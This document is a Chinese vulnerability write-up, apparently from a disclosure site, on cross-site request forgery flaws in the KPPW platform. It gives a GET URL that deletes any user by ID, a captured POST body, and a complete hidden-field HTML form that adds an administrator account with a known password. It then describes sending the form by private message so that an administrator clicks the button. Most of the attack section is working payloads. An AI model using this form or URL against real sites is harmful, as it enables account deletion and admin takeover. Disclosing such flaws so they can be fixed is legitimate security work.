KPPW最新版本(Csrf删除任意帐号/添加管理员)

漏洞作者:

浅蓝

详细说明:

http://localhost/KPPW/index.php?do=user&view=message&op=send

http://localhost/KPPW/index.php?do=pubtask&id=1&step=step2

收件人填目标用户名

标题随便

内容没有转义

不过过滤了敏感标签和 onerror onload等事件。

先来看第一个删除任意帐号

http://localhost/KPPW/admin/index.php?do=user&view=list&op=del&edituid=5529

GET提交此URL 就会删除ID为 “5529”的用户

接着是添加管理员

在添加用户处抓包

提交数据为

edituid=&fds[username]=qianlan&fds[truename]=&fds[phone]=&fds[qq]=&fds[indus_pid]=&fds[indus_id]=&fds[birthday]=&fds[password]=111111&fds[email]=x@q.c&fds[group_id]=1&is_submit=1
 

现在来构造一个表单

<form action="http://localhost/KPPW/admin/index.php?do=user&view=add&edituid=
" method="post">
	<input type=hidden name="edituid" value="">
	<input type=hidden name="fds[username]" value="qianlan">
	<input type=hidden name="fds[truename]" value="">
	<input type=hidden name="fds[phone]" value="">
	<input type=hidden name="fds[qq]" value="">
	<input type=hidden name="fds[indus_pid]" value="">
	<input type=hidden name="fds[indus_id]" value="">
	<input type=hidden name="fds[birthday]" value="">
	<input type=hidden name="fds[password]" value="123456">
	<input type=hidden name="fds[email]" value="x@q.c">
	<input type=hidden name="fds[group_id]" value="1">
	<input type="submit" name="is_submit" value="1">
</form>
 

其他比较敏感的都隐藏起来。 因为script 标签被过滤。 不能自动提交。

所以放出来个按钮,发给人家一看 一个按钮 是谁都会有好奇心 肯定会点下这个按钮。

将此发给管理员。 就坐等添加新帐号吧,或者可以不用写表单, 嵌入其他URL, 还可以自动提交。 此处自由发挥

现在来用小号给管理员发个私信

20175531936a8fe87a0f38e18cd4c8b377a7a0e8[1]

20175554375ace423443d01759d5a031039aefae[1]

现在来看看效果 , 出来一个小按钮 接着点击。

我们现在来后台的会员管理看看是否添加了一个名为qianlan的管理员

2017571790c0747409c7fa4801c84aa579e9e579[1]

添加成功,用户组为管理员

帐号qianlan 密码 123456

发表评论